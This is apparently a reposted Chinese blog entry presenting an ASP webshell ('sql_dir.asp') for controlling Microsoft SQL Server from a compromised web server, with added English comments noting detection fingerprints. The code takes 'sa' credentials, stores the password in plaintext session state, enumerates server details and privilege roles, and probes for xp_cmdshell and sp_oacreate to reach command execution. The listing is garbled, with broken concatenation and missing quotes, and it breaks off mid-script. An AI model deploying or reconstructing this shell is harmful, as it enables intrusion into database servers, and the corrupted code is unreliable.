
mssql操作用webshell--sql_dir.asp

更多 发布于:2012-09-10 21:40


摘自:WowoS Blog
<title>SQL_Dir By Bin</title>
<!-- Fixed page title. Together with the "2007 @ SQL_DIR By Bin" footer emitted
     by the ASP below, this is a static fingerprint of the tool and a usable
     string for content-based detection of this file on a web server. -->
<style id=theStyle>
/* UI stylesheet for the tool's HTML views (login form and later screens).
   Everything is Courier New, 9pt, with a pale blue/grey palette. */
BODY {
FONT-SIZE: 9pt;
COLOR: #000000;
background-color: #ffffff;
FONT-FAMILY: "Courier New";
/* scrollbar-*-color: legacy IE-only properties; other browsers ignore them. */
scrollbar-face-color:#E4E4F3;
scrollbar-highlight-color:#FFFFFF;
scrollbar-3dlight-color:#E4E4F3;
scrollbar-darkshadow-color:#9C9CD3;
scrollbar-shadow-color:#E4E4F3;
scrollbar-arrow-color:#4444B3;
scrollbar-track-color:#EFEFEF;
}
/* Outer table draws only its top and left border; td below draws right and
   bottom, so the two together form a full grid without doubled lines. */
TABLE {
FONT-SIZE: 9pt;
FONT-FAMILY: "Courier New";
BORDER-COLLAPSE: collapse;
border-width: 1px;
border-top-style: solid;
border-right-style: none;
border-bottom-style: none;
border-left-style: solid;
border-color: #d8d8f0;
}
.tr {
font-family: "Courier New";
font-size: 9pt;
background-color: #e4e4f3;
text-align: center;
}
.td {
height: 24px;
font-size: 9pt;
background-color: #f9f9fd;
font-family: "Courier New";
}
input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}
textarea {
font-family: "Courier New";
BORDER-WIDTH: 1px;
FONT-SIZE: 12px;
color: #000000;
}
/* Link states: no underline anywhere; active/hover switch to blue. */
A:visited {
FONT-SIZE: 9pt;
COLOR: #333333;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
A:active {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
A:link {
FONT-SIZE: 9pt;
COLOR: #000000;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
A:hover {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
tr {
font-family: "Courier New";
font-size: 9pt;
line-height: 18px;
}
td {
font-size: 9pt;
font-family: "Courier New";
border-width: 1px;
border-top-style: none;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: none;
border-color: #d8d8f0;
}
.trHead {
font-family: "Courier New";
height: 2px;
background-color: #e4e4f3;
line-height: 2px;
}
.fixSpan {
overflow: hidden;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
}
.fixTable {
word-break: break-all;
word-wrap: break-word;
}
/* Entries of a #fileList container; that markup is not in the visible part
   of this page. "cursor: hand" is the legacy IE spelling of "pointer". */
#fileList span{
width: 120px;
line-height: 23px;
cursor: hand;
overflow: hidden;
padding-left: 5px;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
border: 1px solid #ffffff;
}
</style>
<%if session("login")="" then%>
<%
' Login view. Rendered only while the "login" session flag is empty; it
' collects MSSQL connection details and posts them back to ?action=login.
' The tool has no credential of its own: the only gate to the rest of the
' script is the session flag that the ?action=login branch sets after a
' successful database connection.
' Echo is a Sub defined later in this file (a Response.Write wrapper).
Echo "<body onload=document.formx.pass.focus();>"
Echo "<table width=816 align=center>"
Echo "<form method=post name=formx action=?action=login>"
Echo "<tr>"
Echo "<td align=center class=td>数 据 库 连 接</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td height=75 align=center>"
' Defaults pre-fill host=localhost, port=1433, user=sa.
Echo "IP:<input name=ip type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=localhost> "
Echo "PORT:<input name=port type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=1433> "
Echo "USER:<input name=user type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=sa> "
' The password field is type=text, not type=password, so it is shown in clear.
Echo "PASS:<input name=pass type=text style=border:1px solid #d8d8f0;background-color:#ffffff;> "
Echo "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td align=center class=td><input type=submit value=LOGIN style=border:1px solid #d8d8f0;background-color:#f9f9fd;></td>"
Echo "</tr>"
Echo "<tr>"
' Static banner and link: fixed strings that identify this tool, usable as
' detection content for scans of a web root.
Echo "<td align=center class=td>2007 @ SQL_DIR By Bin <br><a href=http://www.rootkit.net.cn target=_blank>www.rootkit.net.cn</a></td>"
Echo "</tr>"
Echo "</form>"
Echo "</table>"
Echo "</body>"
%>

<%End If %>
<%
' Login handler (?action=login). Builds an OLE DB connection string directly
' from the submitted ip/port/user/pass, tries to open it, and on success marks
' the session as logged in.
' NOTE(review): as pasted, the separators and the missing quote characters on
' several of these lines look like extraction damage; the listing is not
' runnable as shown.
If request("action")="login" Then
SqlLocalName ="";request.Form("ip");",";request.Form("port");"" 连接IP [ 本地用 (local) 外地用IP ]
SqlUserName ="";request.Form("user");"" 用户名
SqlPassword ="";request.Form("pass");"" 用户密码
' Database name is hard-coded; only host/port and credentials come from the form.
SqlDatabaseName="sql" 数据库名
ConnStr = "Provider=Sqloledb;User ID=" ; SqlUserName ; "; Password=" ; SqlPassword ; "; Initial CataLog = " ; SqlDatabaseName ; "; Data Source=" ; SqlLocalName ; ";"
SqlNowString="GetDate()"
' Errors are not raised; the two specific OLE DB error numbers below get a
' message, every other failure gets none (and no login either).
On Error Resume Next 容错
Set Conn=Server.CreateObject("ADODB.Connection")
Conn.open ConnStr
If Err.number=-2147467259 Then
Echo "<script language=javascript> alert(主机IP或者端口连接错误,请检查!);history.back(); </script>"
ElseIf Err.number=-2147217843 Then
Echo "<script language=javascript> alert(用户名或者密码错误,请检查!);history.back(); </script>"
End If
' Success: the DB user name AND password are stored in plaintext session
' state; later in this file they are re-read on every request to rebuild
' the connection string.
If Err.number=0 Then
session("login")="yes"
session("user")=request.Form("user")
session("pass")=request.Form("pass")
session("ip")=request.Form("ip")
session("port")=request.Form("port")
End If
' Unconditional: runs after a failed connect too, so the alert markup written
' above is presumably never displayed — confirm against IIS buffering.
response.redirect"?action=tools"
End If
%>
<%


If request("action")="tools" or request("action")="" Then
If session("login")="yes" Then
%>
<%
rem----------------------------数据库连接-----------------
ConnStr = "Provider=Sqloledb.1;User ID=" ;session("user"); "; Password=" ;session("pass"); "; Initial CataLog = " ; SqlDatabaseName ; "; Data Source=" ; session("ip") ; ",";session("port");";"
Set Conn=Server.CreateObject("ADODB.Connection")
Conn.open ConnStr
Set Cat = Server.CreateObject("ADOX.Catalog")
Cat.ActiveConnection = conn.ConnectionString
rem------------------------函数-------------
' Echo: shorthand for Response.Write; every HTML-emitting line in this
' script goes through it.
Sub Echo(sStr)
Call Response.Write(sStr)
End Sub
' IIf: inline-if helper. Returns val1 when var compares equal to True,
' otherwise val2. Both alternatives are ordinary arguments, so the caller
' evaluates them before the call regardless of which one is returned.
Function IIf(var, val1, val2)
If var = True Then
IIf = val1
Else
IIf = val2
End If
End Function
const copyright = "Code By Bin<br><a href = http://www.rootkit.net.cntarget=_blank>www.rootkit.net.cn</a>"
RootPath = Server.MapPath("/")
Path=Request.ServerVariables("PATH_TRANSLATED")
Server_Name=Request.ServerVariables("SERVER_NAME")
IP=Request.ServerVariables("LOCAL_ADDR")
PORT=Request.ServerVariables("SERVER_PORT")
OS= Request.ServerVariables("OS")
OS= IIf(OS = "", "Windows2003", OS) ; ", " ; Request.ServerVariables("SERVER_SOFTWARE")
OS= OS ; ", " ; ScriptEngine ; "/" ; ScriptEngineMajorVersion ; "." ;ScriptEngineMinorVersion ; "." ; ScriptEngineBuildVersion
Curl=Request.ServerVariables("SCRIPT_NAME")
RequestUrl=Request.ServerVariables("Url")
URL="http://";Server_Name;Requesturl
rem--------------------------------------

rem-----------------------数据库操作--------------------
Set rs = conn.execute("select @@version")
SQLversion=rs(0)
Set rs = Conn.execute("select db_name(0)")
DBname=rs(0)
Set rs = Conn.execute("select user")
DBuser=rs(0)
权限判断
Set rs = Conn.execute("Select IS_SRVROLEMEMBER(sysadmin)")
If rs(0)=1 Then
dbo="sa"
End If
Set rs = Conn.execute("Select IS_MEMBER(db_owner)")
If rs(0)=1 Then
dbo="db_owner"
Else
dbo="public"
End If
扩展判断
Set rs = Conn.execute("select count(*) from master.dbo.sysobjects where xtype=X and name=xp_cmdshell")
If rs(0)=1 Then
xp_cmdshell="XP_cmdshell √"
Else
xp_cmdshell="XP_cmdshell ×"
End If
Set rs = Conn.execute("select count(*) from master.dbo.sysobjects where xtype=X and name=sp_oacreate")
If rs(0)=1 Then
sp_oacreate="SP_oacreate √"

